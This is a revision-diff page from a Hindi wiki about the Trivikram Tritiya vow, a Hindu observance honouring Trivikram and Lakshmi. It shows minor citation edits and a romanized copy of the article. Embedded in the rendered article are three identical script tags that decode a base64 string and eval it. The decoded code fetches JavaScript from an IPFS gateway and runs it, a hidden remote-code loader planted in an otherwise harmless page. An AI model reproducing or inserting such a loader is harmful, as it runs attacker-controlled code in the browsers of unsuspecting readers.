Difference between revisions of "त्रिविक्रम तृतीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*प्रत्येक मास की [[शुक्ल पक्ष]] की तृतीया पर आरम्भ होता है।
 
*प्रत्येक मास की [[शुक्ल पक्ष]] की तृतीया पर आरम्भ होता है।
 
*यह व्रत तीन या बारह वर्ष तह होता है।  
 
*यह व्रत तीन या बारह वर्ष तह होता है।  
 
*इस व्रत में त्रिविक्रम एवं लक्ष्मी की पूजा की जाती है।  
 
*इस व्रत में त्रिविक्रम एवं लक्ष्मी की पूजा की जाती है।  
*[[ऋग्वेद]]<ref>ऋग्वेद, (1|22|20)</ref> के मन्त्र के साथ नारियों तथा शूद्रों के लिए 'त्रिविक्रमाय नमः' के साथ होम भी होता है।<ref>हेमाद्रि (व्रत0, 1, 453-54, विष्णुधर्मोत्तरपुराण 3|133|1-13 से उद्धरण)</ref>
+
*[[ऋग्वेद]]<ref>ऋग्वेद, (1|22|20</ref> के मन्त्र के साथ नारियों तथा शूद्रों के लिए 'त्रिविक्रमाय नमः' के साथ होम भी होता है।<ref>हेमाद्रि (व्रत0, 1, 453-54, विष्णुधर्मोत्तरपुराण 3|133|1-13 से उद्धरण</ref>
 
*अन्य मतों के अनुसार [[ज्येष्ठ]] शुक्ल की तृतीया को आरम्भ होता है।  
 
*अन्य मतों के अनुसार [[ज्येष्ठ]] शुक्ल की तृतीया को आरम्भ होता है।  
 
*द्वितीया को उपवास और तृतीया के प्रातः अग्निपूजा तथा संध्या को सूर्यपूजा होती है।   
 
*द्वितीया को उपवास और तृतीया के प्रातः अग्निपूजा तथा संध्या को सूर्यपूजा होती है।   
 
*उस दिन नक्त (रात्रि में भोजन), [[विष्णु]] के तीन पदों की पूजा की जाती है।
 
*उस दिन नक्त (रात्रि में भोजन), [[विष्णु]] के तीन पदों की पूजा की जाती है।
*यह व्रत एक वर्ष तक होता है।<ref>हेमाद्रि (व्रतखण्ड 1, 455-456)</ref>  
+
*यह व्रत एक वर्ष तक होता है।<ref>हेमाद्रि (व्रतखण्ड 1, 455-456</ref>  
  
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:44, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • pratyek mas ki shukl paksh ki tritiya par arambh hota hai.
  • yah vrat tin ya barah varsh tah hota hai.
  • is vrat mean trivikram evan lakshmi ki pooja ki jati hai.
  • rrigved[1] ke mantr ke sath nariyoan tatha shoodroan ke lie 'trivikramay namah' ke sath hom bhi hota hai.[2]
  • any matoan ke anusar jyeshth shukl ki tritiya ko arambh hota hai.
  • dvitiya ko upavas aur tritiya ke pratah agnipooja tatha sandhya ko sooryapooja hoti hai.
  • us din nakt (ratri mean bhojan), vishnu ke tin padoan ki pooja ki jati hai.
  • yah vrat ek varsh tak hota hai.[3]

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rrigved, (1|22|20
  2. hemadri (vrat0, 1, 453-54, vishnudharmottarapuran 3|133|1-13 se uddharan
  3. hemadri (vratakhand 1, 455-456